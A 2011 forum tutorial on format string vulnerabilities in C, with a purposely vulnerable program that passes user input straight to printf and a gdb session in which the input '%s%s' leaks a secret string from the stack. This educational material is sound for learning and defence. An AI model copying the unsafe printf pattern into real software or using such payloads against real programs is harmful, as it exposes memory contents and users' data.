Understanding Format Strings and Their Vulnerbilities

Discussion in 'C' started by lionaneesh, Feb 3, 2011.

  1. lionaneesh

    lionaneesh Active Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    43
    Occupation:
    Student
    Location:
    India
    Format strings are the strings mainly associated with printf's set of instructions (like printf,fprintf etc..) which basically stands for print format.... These functions accept several arguments and put them on the stack..and as a format specifier is noted in the string the function pops the data from the stack and shows it at that position....eg:-

    In the following call
    Code:
    printf(“Aneesh is %s”,string)
    
    The stack would look like
    Code:
    ==========
    Aneesh is %s
    ==========
    string
    ==========
    Other variables
    ==========
    garbage
    =========
    
    SO what the function basically does is that as it finds a format string specifier it just simply pops the value from the stack and display's us in the format we specified..

    This intern is a vulnerability if not used properly..

    Format String Vulnerabilities



    In this article we'll be only looking at basic format string vulnerabilities ... We'll only be covering how to read data of the stack...

    The vulnerable program we are using :-

    format.c
    Code:
    #include<stdio.h>
    
    int main(int argc,char *argv[])
    {
    	char pass[] = "I am a secret .... Please dont print me..!!\n";
    	printf(argv[1]);
    	return(0);
    }
    
    Compiling :-
    Code:
    aneesh@aneesh-laptop:~/articles/C$ gcc format.c -o format -ggdb -fno-stack-protector
    
    format.c: In function ‘main’:
    
    format.c:6: warning: format not a string literal and no format arguments
    
    GCC being very intelligent tells us not to use this....but then also there are some softwares that contain these kind of vulnerabilities...

    Now lets run the program with basic format string :-
    Code:
    aneesh@aneesh-laptop:~/articles/C$ ./format Hello
    
    Helloaneesh@aneesh-laptop:~/articles/C$ 
    
    It simply prints out hello...

    Now lets open the app in gdb and examine the stack...
    Code:
    aneesh@aneesh-laptop:~/articles/C$ gdb ./format
    
    GNU gdb (GDB) 7.1-ubuntu
    
    Copyright (C) 2010 Free Software Foundation, Inc.
    
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    
    This is free software: you are free to change and redistribute it.
    
    There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
    
    and "show warranty" for details.
    
    This GDB was configured as "i486-linux-gnu".
    
    For bug reporting instructions, please see:
    
    <http://www.gnu.org/software/gdb/bugs/>...
    
    Reading symbols from /home/aneesh/articles/C/format...done.
    
    (gdb)
    
    List the program
    Code:
    (gdb) list
    1	#include<stdio.h>
    2	
    3	int main(int argc,char *argv[])
    4	{
    5		char pass[] = "I am a secret .... Please dont print me..!!\n";
    6		printf(argv[1]);
    7		return(0);
    8	}
    (gdb) 
    
    Place a break point at the start of main
    Code:
    (gdb) break main
    
    Breakpoint 1 at 0x80483ed: file format.c, line 5.
    
    Run the program with some sample string...
    Code:
    (gdb) run hello
    
    Starting program: /home/aneesh/articles/C/format hello
    
    Breakpoint 1, main (argc=2, argv=0xbffff4e4) at format.c:5
    
    5		char pass[] = "I am a secret .... Please dont print me..!!\n";
    
    (gdb) s
    
    6		printf(argv[1]);
    
    (gdb)
    
    Examine the data at the stack
    Code:
    (gdb) x/2s $esp
    
    0xbffff3f0:	 "\364?("
    
    0xbffff3f4:	 "\364\237\004\b\b\364\377\277\350\202\004\b0\340\021I am a secret .... Please dont print me..!!\n"
    
    We notice that we can read the contents of the secret by popping the stack 2 times with %s

    Lets do this and check our solution...

    Code:
    (gdb) run %s%s
    
    Starting program: /home/aneesh/articles/C/format %s%s
    
    Breakpoint 1, main (argc=2, argv=0xbffff4f4) at format.c:5
    
    5		char pass[] = "I am a secret .... Please dont print me..!!\n";
    
    (gdb) s
    
    6		printf(argv[1]);
    
    (gdb) s
    
     ???#a secret .... Please dont print me..!!
    
    7		return(0);
    
    Boom we printed the secret...

    Thats all for this tutorial may be i'll write some more on format string ... like reading memory from desired address...
     
  2. lionaneesh

    lionaneesh Active Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    43
    Occupation:
    Student
    Location:
    India
    Thanks for accepting..
    The best the viewers can do is to post some comments...as feedback...
    Really need them!!!
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice